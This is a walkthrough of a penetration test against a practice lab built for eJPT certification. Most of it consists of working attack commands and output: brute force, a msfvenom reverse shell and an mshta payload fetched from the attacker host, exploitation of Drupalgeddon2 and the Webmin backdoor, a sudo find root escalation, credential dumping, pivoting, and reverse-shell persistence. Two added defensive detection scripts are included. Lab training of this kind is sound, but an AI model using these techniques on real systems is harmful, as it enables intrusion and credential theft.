Breaking into Syntex Dynamics

A full penetration test walkthrough against the Syntex Dynamics practice lab - six DMZ hosts, a dual-homed pivot, and an internal network. The structure closely mirrors what you will encounter in the eJPT certification.

The eJPT (eLearnSecurity Junior Penetration Tester) is an entry-level certification by INE Security that tests practical offensive skills in a fully hands-on environment - no multiple choice, no theory. This is a walkthrough of a practice lab that closely replicates the structure and difficulty of the real assessment. The setup mirrors what the eJPT delivers: a Kali machine accessible through a browser-based Apache Guacamole remote desktop, a DMZ with several heterogeneous hosts, and an internal segment reachable only through a pivot. If you are preparing for the certification, the techniques and workflow documented here are directly applicable.

Lab overview

Network Overview

The lab environment consists of two networks:

Network  | Range            | Description
DMZ      | 192.168.100.0/24 | Directly accessible from Kali
Internal | 192.168.0.0/24   | Only reachable via pivot

The Kali machine sits at 192.168.100.5. All traffic to the internal network must route through a compromised DMZ host.

Reconnaissance

Host Discovery - DMZ

nmap -sn -n 192.168.100.0/24

IP             | MAC
192.168.100.1  | 02:A5:58:C4:06:F7 (gateway)
192.168.100.50 | 02:E5:31:05:C6:DD
192.168.100.51 | 02:85:FB:F6:0D:C3
192.168.100.52 | 02:59:D1:09:E6:C7
192.168.100.55 | 02:29:2A:5D:88:9F
192.168.100.63 | 02:4A:A4:88:C5:57
192.168.100.67 | 02:FF:18:3B:3E:25

Six targets in the DMZ, excluding the gateway and the Kali machine.

Service Scan - DMZ

nmap -p- --open -sS --min-rate 5000 -n -Pn 192.168.100.50,51,52,55,63,67 -oG dmz_allports
nmap -p<open_ports> -sCV 192.168.100.50,51,52,55,63,67 -oN dmz_targeted

Host           | Hostname          | OS                     | Key Ports
192.168.100.50 | WINSERVER-01      | Windows Server 2012 R2 | 80 (Apache/WordPress), 445, 3307, 3389, 5985
192.168.100.51 | WINSERVER-02      | Windows Server 2012 R2 | 21 (FTP anon), 80 (IIS), 445, 3389, 5985
192.168.100.52 | ip-192-168-100-52 | Linux/Ubuntu 20.04     | 21 (FTP anon), 22, 25 (OpenSMTPD), 80 (Drupal), 445, 3306, 3389
192.168.100.55 | WINSERVER-03      | Windows Server 2019    | 80, 445, 3389, 5985
192.168.100.63 | EC2AMAZ-IK4QFED   | Windows Server 2016    | 3389
192.168.100.67 | (none)            | Linux/Ubuntu           | 22

DMZ - WINSERVER-01 (192.168.100.50)

WINSERVER-01 runs a WordPress 5.9.3 site for Syntex Dynamics. The company's office hours (8:00 AM - 6:00 PM) are visible on the landing page - this kind of information gathering detail is typical of the questions you will face in the real assessment.

WordPress Enumeration

Running wpscan with the full enumeration set confirms the WordPress version but does not return any plugins - likely due to the missing API token, which is required for vulnerability lookups and improves detection coverage:

wpscan --url http://192.168.100.50/wordpress/ -e u,vp,ap,tt,t,cb,dbe

WordPress version: 5.9.3

Credential Discovery

Credentials are obtained by brute-forcing the XML-RPC endpoint, which avoids the lockout controls on wp-login.php:

wpscan --url http://192.168.100.50/wordpress/ \
  --usernames admin \
  --passwords /usr/share/wordlists/rockyou.txt \
  --password-attack xmlrpc
echo "192.168.100.50 wordpress.local" >> /etc/hosts

Credentials: admin:estrella
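From the defender's side, this attack is loud in the web server log: a burst of POSTs to xmlrpc.php from a single source, which the lockout logic on wp-login.php never sees. The detection below is an added example and not part of the original walkthrough; the Apache combined-format log lines are constructed, and the threshold and window size are assumptions to tune per site.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
# Apache "combined" format: ip ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

def parse_line(line):
    """Return (ip, timestamp, method, path, user_agent), or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return m["ip"], datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"), m["method"], m["path"], m["ua"]

def detect_xmlrpc_bruteforce(lines, threshold=20, window_seconds=60):
    """Map source IP -> peak number of POSTs to xmlrpc.php inside any sliding window
    of `window_seconds`, keeping only sources whose peak reaches `threshold`."""
    window = timedelta(seconds=window_seconds)
    posts = defaultdict(list)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, ts, method, path, _ua = parsed
        if method == "POST" and path.split("?", 1)[0].endswith("/xmlrpc.php"):
            posts[ip].append(ts)
    flagged = {}
    for ip, stamps in posts.items():
        stamps.sort()
        start, peak = 0, 0
        for end, ts in enumerate(stamps):        # two-pointer sliding window
            while ts - stamps[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[ip] = peak
    return flagged

def sample_log():
    """Constructed log lines (not captured from the lab): 25 XML-RPC POSTs in under
    a minute from the Kali address, plus ordinary traffic from another client."""
    burst = [f'192.168.100.5 - - [10/May/2024:11:02:{s:02d} +0000] '
             f'"POST /wordpress/xmlrpc.php HTTP/1.1" 200 412 "-" "WPScan"'
             for s in range(0, 50, 2)]
    normal = ['10.0.0.7 - - [10/May/2024:11:02:05 +0000] "GET /wordpress/ HTTP/1.1" 200 8831 "-" "Mozilla/5.0"',
              '10.0.0.7 - - [10/May/2024:11:02:09 +0000] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 412 "-" "Jetpack"']
    return burst + normal
```

A legitimate integration such as a mobile app or Jetpack posts to xmlrpc.php too, so the threshold should sit well above that baseline, or the endpoint should simply be disabled where nothing depends on it.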

Plugin Enumeration - wp-admin

Once logged in, the plugin list is visible directly from wp-admin -> Plugins:

Plugin                                | Version
WP File Manager                       | 7.1.4
Burger Companion                      | 4.8
WordPress Responsive Thumbnail Slider | 1.0

The most interesting one is WP File Manager 7.1.4, which provides a full filesystem browser inside wp-admin and allows uploading arbitrary files.

Exploitation - WP File Manager RCE

From wp-admin -> WP File Manager, we upload a PHP reverse shell:

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.100.5 LPORT=4444 -f raw > shell.php

After uploading and triggering it via the browser, we get a Meterpreter session already running as SYSTEM:

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Post-Exploitation

load kiwi
lsa_dump_sam
lsa_dump_secrets
lsa_dump_sam - WINSERVER-01
Domain : WINSERVER-01
SysKey : 37cbff09ae8a6e2a3db546e135ca4650
 
RID  : 000001f4 (500)  User : Administrator  Hash NTLM: 5c4d59391f656d5958dab124ffeabc20
RID  : 000001f5 (501)  User : Guest
RID  : 000003f1 (1009) User : mike             Hash NTLM: c7bad7d1cc2f3c69adea5ccb429234ad
RID  : 000003f2 (1010) User : vince            Hash NTLM: c9b30a86acaea990bf9fa6c35ac9dd92
RID  : 000003f3 (1011) User : admin            Hash NTLM: 72f5cfa80f07819ccbcfb72feb9eb9b7

lsa_dump_secrets reveals the DefaultPassword stored in LSA secrets:

Administrator : ROOT#123

DMZ - WINSERVER-02 (192.168.100.51)

WINSERVER-02 runs IIS 8.5. Anonymous FTP access leads directly to the webroot.

FTP Anonymous Access

ftp 192.168.100.51
# anonymous login - list files

The webroot contains a pre-deployed cmdasp.aspx - a classic ASPX command execution webshell. It is already active and running as NT AUTHORITY\SYSTEM.

Exploitation - ASPX Webshell + HTA Server

With OS command execution available via the webshell, we use the exploit/windows/misc/hta_server Metasploit module. This serves an HTA file that, when fetched by the target, executes our payload:

msf > use exploit/windows/misc/hta_server
msf exploit(...) > set LHOST 192.168.100.5
msf exploit(...) > set LPORT 4446
msf exploit(...) > run

Then from the cmdasp.aspx webshell we issue:

mshta http://192.168.100.5:8080/<random>.hta

This returns a Meterpreter x64 session as NT AUTHORITY\SYSTEM. The same lsa_dump_sam / lsa_dump_secrets workflow recovers credentials:

User          | Hash NTLM
Administrator | 5c4d59391f656d5958dab124ffeabc20
steven        | 8ae09f001f2b3cc4f4ff6346fc9545c4

Password from LSA secrets: Administrator:ROOT#123

DMZ - Linux (192.168.100.52)

This Ubuntu 20.04 box runs three interesting services: Drupal 7.57, OpenSMTPD, and MariaDB.

Drupal Enumeration

curl http://192.168.100.52/CHANGELOG.txt | head -3
# Drupal 7.57

Using the database credentials found in settings.php, we query the Drupal users table over MySQL, which reveals four accounts:

mysql -u drupal -psyntex0421 -e "SELECT name, mail, pass FROM drupal.users;"

name     | mail              | pass
admin    | [email protected] | $S$D4MHMKKb8BovU8F45e9rFCCqbXMDmRnCYSUp0
auditor  |                   | $S$DpQJYqBLxWQJiJSvpHBIEkRb0D7kS3vGMx6z.
dbadmin  |                   | $S$DwXfLGRqMzUG9mCjEtfR6VKClU6ILFRCnV8eY
Vincenzo |                   | $S$DVmI7gBXVE4H6CVD7u7n0BbLH5.xPcQ2u3OGZ

Hashes are cracked with hashcat using Drupal7 mode (7900):

hashcat -m 7900 drupal_hashes.txt /usr/share/wordlists/rockyou.txt

User     | Password
auditor  | qwertyuiop
dbadmin  | sayang
Vincenzo | 789456

Exploitation - Drupalgeddon2

Drupal 7.57 is vulnerable to CVE-2018-7600 (Drupalgeddon2):

msf > use exploit/unix/webapp/drupal_drupalgeddon2
msf exploit(...) > set RHOSTS 192.168.100.52
msf exploit(...) > run

We land as www-data. We switch to auditor using the cracked password:

su auditor  # password: qwertyuiop

Checking sudo -l shows:

(root) NOPASSWD: /usr/bin/find

A classic GTFOBins escalation gets us a root shell immediately:

sudo find . -exec /bin/bash \; -quit
root@ip-192-168-100-52:/var/www/html# whoami
root
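The root cause here is a sudoers rule, not a software bug, and it is easy to audit for. The script below is an added example, not part of the original walkthrough: it parses a sudoers file and flags every NOPASSWD root grant on a binary that can spawn a shell, the exact rule class behind the auditor -> root step above. The sudoers content and the list of shell-escaping binaries are constructed for the example.

```python
import re
# Hand-picked subset of sudo-run binaries with well-known shell escapes
# (an assumption for this example, not an exhaustive GTFOBins list).
SHELL_ESCAPE_BINARIES = {"find", "vim", "vi", "less", "more", "awk", "perl",
                         "python3", "bash", "sh", "env", "tar", "nmap"}
RULE_RE = re.compile(r'^(?P<who>\S+)\s+(?P<host>[^=\s]+)\s*=\s*(?P<spec>.+)$')
RUNAS_RE = re.compile(r'\((?P<runas>[^)]*)\)\s*(?P<rest>.*)')
TAG_RE = re.compile(r'(NOPASSWD|PASSWD|NOEXEC|EXEC|SETENV|NOSETENV):\s*')

def parse_sudoers(text):
    """Return (user, host, runas, nopasswd, command) per command. Runas and
    NOPASSWD/PASSWD tags persist along a comma-separated list, as in sudo's grammar."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()                      # drop comments
        m = RULE_RE.match(line) if line and not line.startswith("Defaults") else None
        if not m:
            continue
        runas, nopasswd = "root", False
        for part in m["spec"].split(","):
            part = part.strip()
            ra = RUNAS_RE.match(part)
            if ra:
                runas, part = ra["runas"], ra["rest"].strip()
            while (t := TAG_RE.match(part)):
                nopasswd = {"NOPASSWD": True, "PASSWD": False}.get(t.group(1), nopasswd)
                part = part[t.end():]
            entries.append((m["who"], m["host"], runas, nopasswd, part))
    return entries

def risky_entries(text):
    """(user, command) pairs granting passwordless root on a binary that can spawn
    a shell, or on ALL commands outright."""
    out = []
    for user, _host, runas, nopasswd, cmd in parse_sudoers(text):
        binary = cmd.split()[0].rsplit("/", 1)[-1] if cmd else ""
        if (nopasswd and runas.split(":")[0] in ("root", "ALL")
                and (cmd == "ALL" or binary in SHELL_ESCAPE_BINARIES)):
            out.append((user, cmd))
    return out

# Constructed sudoers content; the auditor line reproduces the rule found on the lab host.
SAMPLE_SUDOERS = """\
Defaults env_reset
root    ALL=(ALL:ALL) ALL
auditor ALL=(root) NOPASSWD: /usr/bin/find   # the lab's finding
dbadmin ALL=(root) NOPASSWD: /usr/bin/systemctl restart mariadb, /usr/bin/less /var/log/mysql/error.log
%sudo   ALL=(ALL:ALL) ALL
"""
```

Note that the tag carries over within a list: the dbadmin line above quietly makes the less entry passwordless as well, which is why the parser tracks tag state across commas.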

SSH Brute Force

The same OS users authenticate via SSH with the same passwords:

hydra -L users.txt -P drupal_passwords.txt ssh://192.168.100.52
[22][ssh] host: 192.168.100.52  login: auditor   password: qwertyuiop
[22][ssh] host: 192.168.100.52  login: dbadmin   password: sayang

OpenSMTPD - CVE-2020-7247

The SMTP service is OpenSMTPD, vulnerable to CVE-2020-7247 - a remote code execution flaw in the MAIL FROM handler that requires no authentication.

SMB User Enumeration

enum4linux -r -u "" -p "" 192.168.100.52

RID cycling reveals three OS accounts: ubuntu, auditor, dbadmin.

DMZ - WINSERVER-03 (192.168.100.55)

WINSERVER-03 is the most important host in the DMZ. It is dual-homed, bridging the DMZ (192.168.100.55) and the internal network (192.168.0.50). Compromising it is the gateway to the second phase of the engagement.

Exploitation - WinRM Brute Force

msf > use auxiliary/scanner/winrm/winrm_login
msf auxiliary(...) > set RHOSTS 192.168.100.55
msf auxiliary(...) > set USERNAME administrator
msf auxiliary(...) > set PASS_FILE /usr/share/wordlists/rockyou.txt
msf auxiliary(...) > run
[+] 192.168.100.55:5985 - Login Successful: WORKSTATION\administrator:swordfish

When winrm_login finds valid credentials it opens an interactive shell session directly. We interact with it via:

msf auxiliary(...) > sessions -i <session_id>

We confirm the dual-homed status with ipconfig /all:

Ethernet DMZ:       192.168.100.55
Ethernet Internal:  192.168.0.50

Post-Exploitation

load kiwi
lsa_dump_sam
lsa_dump_secrets

User          | Hash NTLM                        | Password
Administrator | 61fb34469b9989b01be4e8630c52eed6 | swordfish
student       | (not cracked)                    | -
mary          | (cracked with hashcat)           | hotmama
lawrence      | (cracked with hashcat)           | computadora

Pivot - Internal Network (192.168.0.0/24)

With a Meterpreter session on WINSERVER-03, we set up a layer-3 route to the internal network:

meterpreter > run autoroute -s 192.168.0.0/24
meterpreter > background
msf > use auxiliary/server/socks_proxy
msf auxiliary(...) > set SRVPORT 9050
msf auxiliary(...) > set VERSION 4a
msf auxiliary(...) > run

This allows using proxychains for external tools (nmap, crackmapexec, evil-winrm).

Host Discovery - Internal Network

A plain ping from Kali cannot reach the internal range, because a Meterpreter route only carries traffic generated by Metasploit modules. We use the post-exploitation sweep module instead:

msf > use post/multi/gather/ping_sweep
msf post(...) > set RHOSTS 192.168.0.1-254
msf post(...) > set SESSION <session_id>
msf post(...) > run
[+] 192.168.0.1  alive
[+] 192.168.0.50 alive  (WINSERVER-03 internal interface)
[+] 192.168.0.51 alive
[+] 192.168.0.57 alive

A follow-up TCP port scan with the MSF scanner finds a fourth host that blocks ICMP:

msf > use auxiliary/scanner/portscan/tcp
msf auxiliary(...) > set RHOSTS 192.168.0.1-254
msf auxiliary(...) > set PORTS 22,80,135,139,443,445,3306,3389,5985,8080,10000
msf auxiliary(...) > set THREADS 10
msf auxiliary(...) > run
[+] 192.168.0.61 - 192.168.0.61:3389 - TCP OPEN
[+] 192.168.0.61 - 192.168.0.61:5985 - TCP OPEN

Internal Network Map

IP           | Hostname        | OS                  | Key Services
192.168.0.51 | (none)          | Linux/Ubuntu        | 22 (SSH), 80 (Apache), 3389 (xRDP), 10000 (Webmin)
192.168.0.57 | (none)          | Linux/Ubuntu        | 22 (SSH only)
192.168.0.61 | EC2AMAZ-IK4QFED | Windows Server 2016 | 3389, 5985 (WinRM)

192.168.0.61 shares the hostname EC2AMAZ-IK4QFED with 192.168.100.63 in the DMZ, confirming it is the same dual-homed host.

Internal - Linux (192.168.0.51)

This Ubuntu host runs Webmin 1.920 on port 10000.

Exploitation - CVE-2019-15107 (Webmin Backdoor)

Webmin 1.920 contains an intentionally backdoored build (CVE-2019-15107). The password reset endpoint executes arbitrary OS commands as root with no authentication required.

msf > use exploit/linux/http/webmin_backdoor
msf exploit(...) > set RHOSTS 192.168.0.51
msf exploit(...) > set RPORT 10000
msf exploit(...) > set SSL false
msf exploit(...) > set payload cmd/unix/bind_perl
msf exploit(...) > set LHOST 192.168.0.51
msf exploit(...) > run
[*] Command shell session opened
# whoami
root

Persistence via Reverse Port Forward

To maintain access across session restarts, we set up a reverse port forward through the WINSERVER-03 pivot:

# On the WINSERVER-03 meterpreter session:
portfwd add -R -l 10777 -p 10777 -L 192.168.100.5

This tunnels connections through: 192.168.0.51:10777 -> 192.168.0.50:10777 -> 192.168.100.5:10777. A cron job on the Linux host then maintains a reverse shell through this tunnel.

Key Challenges

winrm_login False Positives Through Pivot

The winrm_login module crashes with a NoMethodError when it finds a valid login through a SOCKS proxy. The crash causes it to report the last password tested at the time of the crash as valid, regardless of whether it actually worked. Running the module three times produced three different "valid" passwords: abc123, 12345, nicole.

Fix: verify every result with crackmapexec before trusting it:

proxychains crackmapexec winrm 192.168.0.61 -u administrator -p abc123

Bind vs. Reverse Payloads Through a Pivot

Internal hosts on 192.168.0.0/24 cannot initiate connections back to Kali at 192.168.100.5. Any reverse-TCP payload will simply time out.

Fix: switch to bind payloads (cmd/unix/bind_perl, windows/x64/meterpreter/bind_tcp). Metasploit connects to the target through the routed tunnel rather than waiting for a callback.

Credentials Summary

User          | Password    | Service                    | Source
admin         | estrella    | WordPress                  | XML-RPC brute force
Administrator | ROOT#123    | Windows (WINSERVER-01, 02) | LSA DefaultPassword
auditor       | qwertyuiop  | Drupal / SSH / OS          | Drupal hash cracking
dbadmin       | sayang      | Drupal / SSH               | Drupal hash cracking
Vincenzo      | 789456      | Drupal                     | Drupal hash cracking
drupal        | syntex0421  | MariaDB                    | settings.php
administrator | swordfish   | WinRM / SMB (WINSERVER-03) | WinRM brute force
mary          | hotmama     | Windows                    | NTLM hash cracking
lawrence      | computadora | Windows                    | NTLM hash cracking